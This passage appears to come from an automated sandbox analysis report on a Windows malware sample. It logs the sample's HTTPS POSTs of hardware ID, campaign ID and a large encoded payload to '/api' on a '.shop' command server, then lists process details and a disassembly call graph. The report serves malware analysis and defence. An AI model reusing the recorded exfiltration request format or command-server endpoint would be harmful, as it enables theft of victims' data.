                  2024-07-25 20:14:50 UTC5243OUTData Raw: cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: |lQJ$nInVZ+?:us}Q0u?4E([:s~
                  2024-07-25 20:14:51 UTC828INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=nbd7jgt23142ah7va70okoappe; expires=Mon, 18-Nov-2024 14:01:30 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axWG%2FGCRgeAE7y1%2BonvjZHT4Pzhi8bond8v5KpZAqFbwuyZSEhqMOzIG%2F%2BHMc%2BVZvyrn2Nn%2Fyh%2FECTGeEr5xT995zkncE%2BQAI8jtW%2FwB9zUOLBWWcI032nI8zy%2B5MP%2FiAd%2FT73Ag5mWm50M%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed19049d442cf-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:51 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.949711104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:53 UTC289OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 1379
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:53 UTC1379OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:54 UTC810INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=eh15d15e4v7u82ge6025napb3t; expires=Mon, 18-Nov-2024 14:01:32 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mTzqF7XD%2BfiQIWfHaJWpxhaUQhhMFciVW2Vi9OFB6ohSEYrd7ajAVI9CShphK2bQuyVK53UZu5Y2rag1NxCWq16jBlxjGrc6yFQue3DTtNXIiGvII%2FwD9VClK6vM1Midw5DV33%2FdieownAo%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1a21aba17b5-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:54 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:54 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.949712104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:55 UTC291OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 584281
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 56 95 de f5 ed c0 9b 9b bb da 93 dc 46 10 95 56 b1 9d 5d bf 0b 4c ad 79 fd 6f df d0 aa 16 16 76 08 c0 51 35 00 95 1b 75 b7 82 08 18 2e 20 01 8c f0 ad 88 1e 88 44 d2 be d0 e7 89 24 a6 d2 da b6 83 16 46 42 77 ee 41 c8 71 02 78 56 4d bf 01 5a 4b 37 a7 2e ab 02 4d fb aa 06 82 98 51 92 c8 74 0d 0f 93 0a 61 5e ac e6 44 43 99 7f 94 46 b8 5d 2e ac 40 5e a9 f5 f0 e2 20 51 73 73 c5 5f f3 a9 81 e3 7c 03 ec 86 99 50 eb 86 c7 71 ed c5 d9 58 58 7b d1 2c a7 70 6f c2 db dd 34 f6 f8 94 41 a5 f8 64 b1 f4 8a 2f 33 22 63 b6 ae 37 9e e3 74 97 ab 15 08 06 a1 42 e0 72 6b 43 46 4e 33 ba fd 39 dc c1 3d 7c 10 bc 71 26 d2 67 0d 02 66 7f ea 0e 66 4e d3 09 48 37 e1 bd 5d e9 b2 22 cd 32 74 9e de a6 7a c7 87 47 69 39 09 8c a5 bb d2 3d 50 fb 80 d5 9f 8e 1e ff cb 35 7c 89 44 91 d0 40 c2
                  Data Ascii: VFV]LyovQ5u. D$FBwAqxVMZK7.MQta^DCF].@^ Qss_|PqXX{,po4Ad/3"c7tBrkCFN39=|q&gffNH7]"2tzGi9=P5|D@
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 8d b1 6e 0e 02 61 a5 83 14 43 4c ea 83 0b f1 18 96 40 e7 d3 1f cb b2 09 8f aa f5 ff 00 17 47 fc ad 3a 8b 57 af a3 37 9f 95 10 a1 0d 3c 7b df 47 bb 44 4e fc 80 94 75 50 58 40 d4 da 87 ef 77 0e 07 7e 96 5f f9 1e 40 43 ef eb 2f 55 90 28 dc 8a df 2b 1d 06 df 1b 91 ee 0d b1 cc 0c 9c e4 b5 58 7b 17 64 f6 77 82 68 bd 1f b5 47 fe fc ee 06 f6 68 37 a3 a7 99 a1 e4 36 da 37 c7 e5 b5 b5 cc 28 9b cc 2e 6b de da 14 ae f2 f0 ea 0d 88 bd 52 ec 7d f3 3b 98 eb 4e 0c 1a 51 7c ee 13 ae e3 5e af 35 53 3c 14 c3 c5 9c e5 d8 9f 3c 5d e9 13 b3 bf c6 c2 fb 80 67 47 c4 31 9b 35 43 eb f2 7e fc 94 cc 48 37 66 78 af e4 c3 d9 df cb 2b d7 67 a6 1d 9b 33 ab ab 46 cf 70 9d 65 76 3b 56 08 9f bd 77 a7 93 43 e1 e0 f3 b5 8d d7 77 e3 58 33 63 ce 23 3a 86 d3 80 2e 3a 9a b4 2b f5 eb ac 09 d4 6c
                  Data Ascii: naCL@G:W7<{GDNuPX@w~_@C/U(+X{dwhGh767(.kR};NQ|^5S<<]gG15C~H7fx+g3Fpev;VwCwX3c#:.:+l
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 49 5c f2 99 10 29 bc 60 39 7a 3d 65 67 e9 e9 cb cf 1e 6c d4 cb e7 47 62 1c be 2b 07 d6 08 e2 f5 78 f8 72 8d da cf 11 19 00 74 53 3e 11 18 d2 d8 89 51 4f da a0 95 7b 13 63 3b 6f 7e 49 a0 43 bd ad 23 be 12 8b 08 21 91 3e b7 41 ac e5 6a e6 5e 0c 5e 68 d2 99 4d 6e df 7a 1b 6c b4 e9 2b a5 a4 57 e0 11 5b b3 c6 a8 fc 3a 2e a3 ef ed 5e a5 62 b1 32 7c 32 b8 86 d9 e8 de a4 26 fe 1e 81 25 4a ed 79 76 48 84 0c 70 92 3b a1 b4 e7 2d 9c f8 35 fa 90 d3 9a 10 d5 a1 ad 08 4e 22 11 ad ac 67 1d 75 b6 1e 1c 3d c5 5e 04 09 e3 b8 5f f2 96 41 19 2a fb c9 3d bd 91 07 3f 98 e5 0e 25 3f 25 91 32 b9 80 22 4a e2 09 28 94 14 d1 e0 6b c4 7e 39 ea f1 b1 49 04 b8 22 e1 87 9b f5 70 0a 20 07 5b d8 fd 35 21 24 33 8d 43 4c 09 48 68 ac ee 44 de 65 03 c5 2a e1 ff 71 07 94 1c f2 86 02 39 0e c0
                  Data Ascii: I\)`9z=eglGb+xrtS>QO{c;o~IC#!>Aj^^hMnzl+W[:.^b2|2&%JyvHp;-5N"gu=^_A*=?%?%2"J(k~9I"p [5!$3CLHhDe*q9
                  2024-07-25 20:14:55 UTC15331OUTData Raw: fc e0 7d c2 69 3f b3 81 c3 84 a6 b0 27 00 1b 92 d6 41 77 18 40 0e 13 5d d7 8a 01 26 fd de a0 7f bc 36 2f fc ee 79 95 0f 8b 7a a1 7a e8 84 82 07 b3 7c 47 dc d8 af a3 72 dc aa 85 d8 a0 93 96 e4 6c 25 fd 14 7a b6 cb eb d7 a1 1f 1d 2e 89 07 b1 af 63 56 7a 58 59 66 b3 34 6b 5a 10 7c 3d 1d fe 41 1a bd 4e 85 27 47 de cb 5e a3 a1 36 05 56 cb 5e 13 e5 26 1d 78 51 29 44 a5 37 31 65 41 7e 7a c7 ad e1 06 4e e9 af 82 3b 21 a8 e5 28 79 3c b6 97 97 c3 71 ef de 2f da 9e bc 9d 14 d4 d8 77 f8 8e bc cd 9a 72 ad 94 13 43 10 82 ef 80 4c 0e e3 c5 61 87 e1 df 40 42 a1 49 8a df 20 3c 6f 2e b9 27 7b af 77 27 fb e9 cd 88 87 b4 d7 a5 5f 97 c3 ce c8 94 3a c1 0a 23 48 17 dd f1 90 00 a1 65 5e 10 39 05 ff 54 ca f2 b9 42 b0 10 ac 8c 78 ba f4 7b 13 3d c4 dd d9 de 89 1b 97 c3 54 a6 d7 2d
                  Data Ascii: }i?'Aw@]&6/yzz|Grl%z.cVzXYf4kZ|=AN'G^6V^&xQ)D71eA~zN;!(y<q/wrCLa@BI <o.'{w'_:#He^9TBx{=T-
                  2024-07-25 20:14:55 UTC15331OUTData Raw: d7 4a 63 c9 2c cb e1 65 f3 77 e6 49 68 3c 2a 4c 8b 17 87 4b 52 36 95 ca 08 d7 6b 61 2d 3d f4 65 58 31 60 f5 9f 66 37 02 9a 12 8f ee 10 8e d5 a4 24 c9 33 f1 7c a7 89 89 ad 3e 5b 33 d5 8b 7d bd 45 74 4e 19 6a 6a 8f e0 8b 43 b1 ce e8 48 b5 d9 bc 29 37 d1 62 5f b6 f7 79 a6 e7 0c 0d 80 d9 9b 37 87 d9 0f 3c de cf 39 d8 24 90 44 54 2e aa 4e fe 60 af 17 d3 1f c1 86 08 54 3b cd 34 a5 3a 9d d3 2b 6e b1 21 5f 68 21 20 8c a0 20 81 75 68 b9 af 32 54 ed 97 eb 38 55 0a 93 62 85 fa 3d 7c 92 53 2b 8a 92 fa 45 50 8e 8e d1 64 51 3c 7c 78 10 fb 73 47 26 7f 3c 9e d8 d4 10 ea fe 2d 26 8a 12 ba 98 e1 c5 a2 a5 7c 5c 85 19 d0 ca 42 52 97 51 ee aa 00 94 94 9d 18 ea 28 03 89 12 03 44 17 47 3e f7 17 92 f2 d1 bc da cf 54 f1 67 38 84 fd 16 fa 25 16 7a f7 83 4b 83 f6 e4 85 73 59 41 53
                  Data Ascii: Jc,ewIh<*LKR6ka-=eX1`f7$3|>[3}EtNjjCH)7b_y7<9$DT.N`T;4:+n!_h! uh2T8Ub=|S+EPdQ<|xsG&<-&|\BRQ(DG>Tg8%zKsYAS
                  2024-07-25 20:14:55 UTC15331OUTData Raw: d5 5b c0 f6 a0 55 7b f5 16 e2 d1 6b 9a 69 1c a1 73 6c ea bb 9e 67 94 7c 12 ce 6c 34 53 91 cb 8b b8 5c 1f a3 72 a1 06 45 f1 d9 d5 cc 3d 96 64 6a 1f 16 70 eb 6a 8a 33 df 32 f7 fe ed fc 64 15 84 ea ef 3c 62 d2 14 df e1 3b 7c 42 d7 6d 30 07 6d ff 57 c3 b4 96 12 ad 7c 87 ff fc 04 6e cd 93 ae cd 9b d9 25 a6 32 34 6b d8 77 56 8e ad 66 11 fa 3c f2 89 8b 4d 92 d7 79 0c 29 6c f5 ea ef 97 b1 d0 3c 58 02 6b bd 88 7c 9c a9 7e 86 22 3a ab c3 b4 07 d0 97 c5 d3 2d 30 8d 1a 4a 90 e4 a6 67 ab 0a 2a a8 e0 80 24 ad 8d 4a 90 25 5a e5 e6 3b 02 8a d3 37 0e 7d 3d 09 ce ec b0 fe 4d c0 97 33 2f bb 40 e9 02 cc 1d 7f d4 c1 c8 97 5e a4 89 ed 56 5d c3 b4 7d 06 fd c7 34 35 34 f8 d2 bf 9b 0b 03 53 2d f4 2f 23 4c 7a ca 17 aa 3c 79 69 c4 e8 29 b5 42 09 09 b2 fa d3 58 b1 16 ec 40 50 62 fe
                  Data Ascii: [U{kislg|l4S\rE=djpj32d<b;|Bm0mW|n%24kwVf<My)l<Xk|~":-0Jg*$J%Z;7}=M3/@^V]}454S-/#Lz<yi)BX@Pb
                  2024-07-25 20:14:55 UTC15331OUTData Raw: f7 08 8c e8 6d a3 05 0a 8c 90 9e 5f 28 9a ad 82 84 7c eb a8 a0 10 18 74 c9 b6 e0 a9 18 cd 25 ff e5 1d 50 a0 8c 49 f2 e7 df 04 a0 44 a2 e1 c3 7f ff c9 db 9f 8f ae e4 39 44 41 d8 ae a3 ad ba dc 97 aa 58 41 0c 8c 5b f6 ce 9b aa d0 3c 67 28 df 01 d5 1d 93 1e eb 4c b9 a9 56 5b ee 40 e9 91 4d 42 3c 30 d8 42 ef d7 d7 6c 8c e2 e1 38 98 97 05 e9 a5 a8 8c 73 b8 c6 0c d1 e3 ee 4b 94 0c 43 1c ac 6e 03 20 5a a9 f7 ec 81 ad 1c f7 77 88 24 58 9d c2 f2 dd 31 22 b1 e9 21 70 56 d7 7e d2 41 fe ab db 31 a3 99 a0 a3 4d f8 62 22 ba cf 8a 6e f7 53 c9 33 b3 21 25 2a 50 8c 73 db b1 c0 45 1d d7 ed 10 19 05 19 32 db 2d 29 d6 0b b5 a4 e9 13 e0 a4 d8 fa 4f 93 7f 11 bf d4 90 a7 f3 f0 b0 88 fa 73 6a 4a bb cf e2 dd 4f 88 5f 55 3a be dc e4 51 87 af 40 f1 83 16 a6 e3 72 c2 22 55 db 55 1b
                  Data Ascii: m_(|t%PID9DAXA[<g(LV[@MB<0Bl8sKCn Zw$X1"!pV~A1Mb"nS3!%*PsE2-)OsjJO_U:Q@r"UU
                  2024-07-25 20:14:55 UTC15331OUTData Raw: 08 29 91 3b 6a a4 24 31 19 6b fc d1 1d 9e b0 ca ad 5f 89 c9 84 d7 5d c4 8e e3 af bb c3 e3 e3 4d 93 11 ab 30 70 87 1f 43 49 6b 13 6a 30 89 5b 1f 30 c7 c2 09 71 2c 71 30 ee 72 9d e1 68 fd 5b c9 8f 25 86 0c b8 c7 39 87 84 4a 85 f5 1b 42 c6 88 16 37 74 f3 3c 10 a4 47 c2 4b 23 11 d0 c0 ba f5 0b e5 29 70 4d b8 b7 8b 51 a1 9e 5c cf 6f cf 43 8d fc 1c 9e b8 73 51 9b cc 59 83 f9 bb 46 44 8a 35 1c 28 50 4b cf ec b2 51 51 4e 09 e7 99 10 fa 44 91 00 f6 23 c2 d6 fa b8 1f 1f ee 3a d5 1d 71 4b 4d 1b d0 4f 87 e6 c3 97 30 bf 64 f8 6f 55 e6 4b 45 62 37 6f 77 e5 2f 16 79 d5 6c 1a 4f 81 ee b4 8f df da c1 fc de 14 d8 d6 f7 b4 68 d5 c4 74 5f 13 e7 34 a6 bd 0f 6b 20 c1 69 c1 fa b1 e3 5b 65 24 79 48 de ec aa fb 72 b4 51 c2 a3 b8 9a 81 c5 57 cf aa f7 61 0b bd 94 47 42 36 53 26 e0
                  Data Ascii: );j$1k_]M0pCIkj0[0q,q0rh[%9JB7t<GK#)pMQ\oCsQYFD5(PKQQND#:qKMO0doUKEb7ow/ylOht_4k i[e$yHrQWaGB6S&
                  2024-07-25 20:14:55 UTC15331OUTData Raw: ed 96 fc cf 1e ce d1 b2 a9 52 52 a0 0b c8 f0 63 3e 19 15 bd d3 d1 b3 9d 36 29 c2 30 75 b7 e4 36 62 37 6d a4 4d 93 52 8e 92 5f 93 07 0b 51 30 cd bf a6 bf d9 68 83 94 1a c2 51 69 2e 5f 3d 31 e6 b4 79 10 e2 c5 d9 d4 cd ff 30 91 9a b4 26 8d f2 b9 e9 19 59 e0 44 9d 73 9c 7d 27 f5 b0 c8 9f 95 ce 3c 33 b8 78 e8 f3 e5 b5 13 d7 fb cb 9d 7d a6 e6 0e f4 bc 73 f6 8e 0f d9 e4 68 96 ea 2a ea 35 97 ff 65 da f5 d5 c5 56 4c ee e7 ac a0 3e 4f fc c8 0b 0e eb f7 5c eb d7 ed eb 7c b0 23 38 6d 7a 20 f4 f7 a9 bc b6 be f3 d6 69 b3 03 e1 eb bd b3 33 6e 15 c3 03 c1 a3 a5 b3 69 6e 2d 3e b4 15 eb 16 ab 9d 5d 83 f6 d1 dd 73 bd 5e 95 6d a2 e0 fa 0c 12 54 70 d6 a7 ae cf f4 7c 9a bd b9 e3 29 d5 57 52 63 8a 47 c9 a6 64 22 4e f3 28 27 73 f0 22 99 8c 60 c8 ff eb a2 af 7e e0 0d 01 3c 8c 01
                  Data Ascii: RRc>6)0u6b7mMR_Q0hQi._=1y0&YDs}'<3x}sh*5eVL>O\|#8mz i3nin->]s^mTp|)WRcGd"N('s"`~<
                  2024-07-25 20:14:57 UTC818INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=7df4vh7e12kog90uibea12ajff; expires=Mon, 18-Nov-2024 14:01:35 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUgXspimXoa0T1OV5z2aT3ySGH%2BeQlal%2BueUnjQTalpgLvY7u4LybWI%2BxnpEKM5%2BRGOy3XXXybMDWWnx8cllS1m5BlTZdAeH2F7DbNdmXv28h2%2B2uo1S913mDBveDo1U%2Fhor0UgzhSbS%2F4s%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1ad89988cb7-EWR
                  alt-svc: h3=":443"; ma=86400


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:16:14:41
                  Start date:25/07/2024
                  Path:C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_236.exe"
                  Imagebase:0x3b0000
                  File size:5'735'941 bytes
                  MD5 hash:8ECBC517B61CDB069495B3F3E3887A0F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:13.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:15.9%
                    Total number of Nodes:675
                    Total number of Limit Nodes:17
                    execution_graph 15091 409a02 15092 409a0d __DllMainCRTStartup@12 15091->15092 15095 40990c 15092->15095 15094 409a20 15096 409918 ___BuildCatchObject 15095->15096 15100 409965 15096->15100 15101 4099b5 ___BuildCatchObject 15096->15101 15103 4097d7 15096->15103 15098 409995 15099 4097d7 ___DllMainCRTStartup 18 API calls 15098->15099 15098->15101 15099->15101 15100->15098 15100->15101 15102 4097d7 ___DllMainCRTStartup 18 API calls 15100->15102 15101->15094 15102->15098 15104 409862 15103->15104 15111 4097e6 ___DllMainCRTStartup 15103->15111 15105 409868 15104->15105 15106 409899 15104->15106 15109 409883 15105->15109 15133 4097f1 15105->15133 15202 40d5e2 15105->15202 15107 4098f7 15106->15107 15108 40989e 15106->15108 15107->15133 15228 40ae8a 15107->15228 15205 40ab70 TlsGetValue 15108->15205 15116 40d893 ___DllMainCRTStartup 7 API calls 15109->15116 15109->15133 15111->15133 15144 40aef8 15111->15144 15120 40988d 15116->15120 15119 409801 15149 40ddc7 15119->15149 15122 40aba4 __mtterm 8 API calls 15120->15122 15124 409892 15122->15124 15126 40ddc7 ___DllMainCRTStartup 2 API calls 15124->15126 15125 4098cd 15127 4098d4 15125->15127 15128 4098eb 15125->15128 15126->15133 15218 40abe1 15127->15218 15222 409fe4 15128->15222 15129 4097fd ___DllMainCRTStartup __RTC_Initialize 15129->15119 15155 40d63f 15129->15155 15133->15100 15134 409827 15135 40982b 15134->15135 15169 40db59 15134->15169 15161 40aba4 15135->15161 15139 40984b 15139->15133 15198 40d893 15139->15198 15145 40af08 __onexit_nolock ___DllMainCRTStartup 15144->15145 15146 40af1d ___DllMainCRTStartup 15145->15146 15147 40aba4 __mtterm 8 API calls 15145->15147 15146->15129 15148 40b080 15147->15148 15148->15129 15150 40de27 15149->15150 15152 40ddd0 15149->15152 15150->15133 15151 40de15 HeapFree 15151->15150 15152->15151 15153 40ddfc HeapFree 15152->15153 15153->15152 15154 40de14 15153->15154 15154->15151 15156 40d64b ___BuildCatchObject ___DllMainCRTStartup 15155->15156 15157 40d292 __setenvp 8 API calls 15156->15157 15159 40d66c 15157->15159 15158 40d292 __setenvp 8 API calls 15158->15159 15159->15158 15160 40d754 ___lock_fhandle ___BuildCatchObject ___DllMainCRTStartup 15159->15160 15160->15134 15162 40abba 15161->15162 15163 40abae 15161->15163 15165 40abce TlsFree 15162->15165 15166 40abdc 15162->15166 15164 40aaf5 __onexit_nolock 2 API calls 15163->15164 15164->15162 15165->15166 15167 409fe4 ___free_lc_time 7 API calls 15166->15167 15168 40f251 15166->15168 15167->15166 15168->15119 15170 40db6e 15169->15170 15172 40db73 ___DllMainCRTStartup 15169->15172 15239 40a737 15170->15239 15243 40d9bf 15172->15243 15175 409837 15175->15139 15179 40d8e1 15175->15179 15178 40d9bf _parse_cmdline 7 API calls 15178->15175 15180 40d8ea 15179->15180 15183 40d8ef _strlen 15179->15183 15181 40a737 ___initmbctable 7 API calls 15180->15181 15181->15183 15182 40d292 __setenvp 8 API calls 15191 40d924 __invoke_watson _strlen 15182->15191 15183->15182 15186 409840 15183->15186 15184 40d982 15185 409fe4 ___free_lc_time 7 API calls 15184->15185 15185->15186 15186->15139 15192 40d41b 15186->15192 15187 40d292 __setenvp 8 API calls 15187->15191 15188 40d9a8 15189 409fe4 ___free_lc_time 7 API calls 15188->15189 15189->15186 15190 40907c _strcpy_s 2 API calls 15190->15191 15191->15184 15191->15186 15191->15187 15191->15188 15191->15190 15193 40d429 __IsNonwritableInCurrentImage 15192->15193 15464 4118fd 15193->15464 15195 40d447 __initterm_e 15197 40d466 __IsNonwritableInCurrentImage __initterm 15195->15197 15468 40b449 15195->15468 15197->15139 15199 40d89c 15198->15199 15200 409fe4 ___free_lc_time 7 API calls 15199->15200 15201 40d8b0 15199->15201 15200->15199 15201->15135 15531 40d4a0 15202->15531 15204 40d5ed 15204->15109 15206 4098a3 15205->15206 15207 40ab85 15205->15207 15210 40d292 15206->15210 15208 40aaf5 __onexit_nolock 2 API calls 15207->15208 15209 40ab90 TlsSetValue 15208->15209 15209->15206 15212 40d29b 15210->15212 15213 4098af 15212->15213 15542 411fe9 15212->15542 15213->15133 15214 40aaf5 TlsGetValue 15213->15214 15215 40ab0d 15214->15215 15217 40ab22 __onexit_nolock 15214->15217 15216 40ab17 TlsGetValue 15215->15216 15215->15217 15216->15217 15217->15125 15219 40abed __onexit_nolock ___BuildCatchObject 15218->15219 15220 40f34e _raise 7 API calls 15219->15220 15221 40ac5e 15220->15221 15221->15133 15224 409ff0 ___BuildCatchObject 15222->15224 15223 40a056 ___BuildCatchObject _realloc _write_string 15223->15133 15224->15223 15226 40f34e _raise 6 API calls 15224->15226 15227 40a007 ___sbh_free_block ___sbh_find_block ___free_lc_time 15224->15227 15225 40a044 HeapFree 15225->15223 15226->15227 15227->15223 15227->15225 15229 40aee3 15228->15229 15230 40ae98 15228->15230 15231 40aef6 15229->15231 15232 40aeed TlsSetValue 15229->15232 15233 40ae9e TlsGetValue 15230->15233 15237 40aec1 15230->15237 15231->15133 15232->15231 15234 40aeb1 TlsGetValue 15233->15234 15233->15237 15234->15237 15235 40aaf5 __onexit_nolock 2 API calls 15236 40aed8 15235->15236 15552 40ad5b 15236->15552 15237->15235 15240 40a740 15239->15240 15241 40a747 15239->15241 15253 40a59d 15240->15253 15241->15172 15245 40d9de 15243->15245 15247 40da4b 15245->15247 15431 412614 15245->15431 15246 40db49 15246->15175 15249 40d24d 15246->15249 15247->15246 15248 412614 7 API calls _parse_cmdline 15247->15248 15248->15247 15251 40d256 15249->15251 15252 40d28c 15251->15252 15437 40b4af 15251->15437 15252->15175 15252->15178 15254 40a5a9 ___BuildCatchObject 15253->15254 15267 40ad41 15254->15267 15258 40a5bc 15279 40a33c 15258->15279 15260 40a5c7 15261 40d24d __mtinitlocknum 7 API calls 15260->15261 15266 40a60d ___BuildCatchObject _write_string __setmbcp 15260->15266 15262 40a5dd 15261->15262 15262->15266 15282 40a3b8 15262->15282 15264 40a600 15265 409fe4 